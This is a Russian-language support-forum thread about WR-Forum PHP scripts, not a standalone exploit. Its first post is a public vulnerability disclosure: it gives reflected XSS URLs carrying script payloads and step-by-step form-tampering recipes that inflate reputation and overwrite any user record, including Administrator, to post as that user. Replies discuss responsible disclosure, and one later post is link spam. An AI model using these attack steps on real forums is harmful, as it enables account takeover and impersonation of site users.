Бесплатные PHP скрипты - форум техподдержки

Бесплатные PHP скрипты - форум техподдержки

Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!

Главная сайта бесплатных php скриптовГлавная сайта   ПоискПоиск  
Сегодня: 21.07.2024 - 23:16:05
Страницы:  1  

QWERTY

Объявление - WR-Scriptы в UTF-8 кодировке

Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.

На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий!
Планирую продолжить работы весь 2023 год.

АвторСообщение

Q

Q
гость

редставляю отчёт об уязвимостях, найденных мною в WR-Forum 1.8 M.

1. Пассивные XSS

http://localhost/forum/tools.php?event=moresmiles&lines[12]=http://localhost/wrf/smile/"><script>alert( )</script>.gif

Здесь lines[12] означает количество картинок в папке smile. По умолчанию их там 12 штук, но вообще количество может быть другим. Для реализации уязвимости нужно указать первое неинициализированное значение в массиве $lines (по умолчанию 12), а опция register_globals на сервере должна быть установлена в On.

Ещё

http://forum.wmbux.info/tools.php?event=mailto&name=Pupkin&email=pupkin@dudak.ru<script>alert()< /script>

2. Махинации с репой.

Имеется возможность выставления неадекватно большой или неадекватно маленькой репы, например, 1000000 или -1000000000 и т.д.
Заходим по ссылке вида

http://localhost/forum/index.php?fid=1&id=111042960938#

Открываем исходный код страницы, ищем строчки
Цитата:<FORM action='tools.php?event=repasave' method=post>

<TD bgcolor=#00880B><font size=+2 color=white>+5<INPUT name=repa type=radio value='+5'></TD>

Заменяем на

<FORM action='http://localhost/forum/tools.php?event=repasave' method=post>

<TD bgcolor=#00880B><font size=+2 color=white>+1000000<INPUT name=repa type=radio value='+1000000'></TD>

Сохраняем страницу на жесткий диск, затем открываем её оттуда, выбираем репутацию '1000000', жмём кнопку "Отправить".

3. Затирание произвольного юзера в базе, либо создание клона уже существующего юзера.

Ошибка связана с отсутствием фильтрации в переменной $ok файла tools.php

PHP код:
// проверка Логина/Старого пароля
$lines=file("$datadir/usersdat.php"); $i=count($lines);
do {$i--; $rdt=explode("&#124;", $lines[$i]);
if (strtolower($name)===strtolower($rdt[0]) & $oldpass===$rdt[1]) {$ok="$i";} // Ищем юзера логин/пароль
else { if ($email===$rdt[3]) {$bademail="1"; } } // Вдруг у когото уже есть такой емайл?
} while($i > "1");
if (isset($bademail)) {print "$back. Участник с емайлом <B>$email уже зарегистрирован</B> на форуме!</center>"; exit;}
if (!isset($ok)) {setcookie("wrfcookies","",time());
print "$back Ваш новый логин /пароль / Емайл не совпадает НИ с одним из БД. <BR><BR>
Смена электронного адреса <font color=red><B>Запрещена</B></font><BR><BR>
<font color=red><B>Ошибка скрипта или попытка взлома - обратитесь к администратору!</B></font>";
exit;}
$udt=explode("&#124;",$lines[$ok]); $dayreg=$udt[4]; $kolvomsg=$udt[2]; $status=$udt[13];

.................................................. ....................................


Регистрируемся на форуме, заходим на страницу редактирования профиля по ссылке вида
Цитата:http://localhost/wrf/tools.php?event=profile&pname=pupkin

Открываем исходный код страницы, ищем строчки
Цитата:<form action='tools.php?event=reregist' name=creator method=post enctype=multipart/form-data>

<input type=hidden name=name value='pupkin'>

Заменяем их на
Цитата:<form action='http://localhost/forum/tools.php?event=reregist' name=creator method=post enctype=multipart/form-data>

<input type=hidden name=name value='Administrator'>

а также добавляем строку
Цитата:<input type=hidden name=ok value='3'>

, где ok - номер строчки в файле usersdat.php, куда будет записана информация о созданном юзере. Юзер, который уже находится в данной строчке - будет затёрт.

Сохраняем страницу на жесткий диск, открываем её оттуда, идём в поле "Адрес e-mail: *" и указываем там новый e-mail, которого ещё нет в базе форума. Жмём кнопку "Cохранить изменения".

Всё - можем размещать сообщения от имени другого пользователя.

Сообщение # 1 01.06.08 - 17:30:56

Zorg

Z
гость

Q, хороший отчет, только нужно было его сделать приватным (отослать автору на email). Думаю много умников найдется -) wr-forum держится на чесном слове, он дырявый как решето, это к сожалению не секрет.

Сообщение # 2 01.06.08 - 18:07:55

Zorg

Z
гость

глобал регистер - смерть. нужно прикрыть эти ляпы в demod.

Сообщение # 3 01.06.08 - 18:10:00

kilogram

K
Участник форума

Если приватным, то никакого куража ))))
А так типа вот я какой маладес, типа Q (Вроде зорро!)
Этим отличается хакер от какера.

Впрочем кому надо тот уже все приметные щели замазал сам )

Сообщение # 4 02.06.08 - 22:02:32

wooohooo

W
гость

Усердно работаем http://rabotaem100.ru/ строим дом http://stroy-dom100.ru/ архитектура дома http://stroim-dom100.ru/ быстрые автомобили http://avtomobil100.ru/ самые новые авто http://avtomobil200.ru/ туристы отдыхают http://turist100.ru/ секреты модниц http://modnie-vse.ru/ модные и красивые http://modnie-krasivie.ru/ красивые и стильные http://krasivie-modnie.ru/ стрижки и прически http://krasivaya-modnaya.ru/ красивая и модная http://otdih-tury.ru/ курорты и отдых http://twitter.com/cp_ket
Обувь http://krasivie-tufli.ru/ красивые туфли http://odezhda-stilnaya.ru/ одежда стильная http://obuv-modnaya.ru/ модная обувь http://tufli-krasivie.ru/ туфли http://tufli-stilnie.ru/ стильные http://nogti-modnie.ru/ ногтики http://fashion-tufli.ru/ высокая мода http://krasiviy-makiyazh.ru/ макияж http://stilnie-pricheski.ru/ прически http://krasivie-nogti.ru/ красивые ногти http://odezhda-style.ru/ одежда http://modnie-krasotki.ru/ красотки http://krasotki-modnie.ru/ яркие красотки http://krasotki-stilnie.ru/ радостные http://detki-radost.ru/ все стильные http://vse-stilnie.ru/ красивые и стильные http://stilnie-vse.ru/ красота

Сообщение # 5 04.06.13 - 09:39:02
Хакер нубло!!! Читай эту тему!!! :Предыдущая темаСледующая тема: counter
Страницы:  1  

Сообщение
Имя E-mail
Сообщение

Нажмите на точку возле имени для обращения к участнику

Смайлы:

Ещё смайлы
Эмодзи
         
Защитный код: (введите цифры, которые на синем фоне)
Ответ на вопрос: (Какой сейчас год?)
   
WR-Счётчик
Powered by WR-Forum Professional © 2.3 UTF-8 beta версия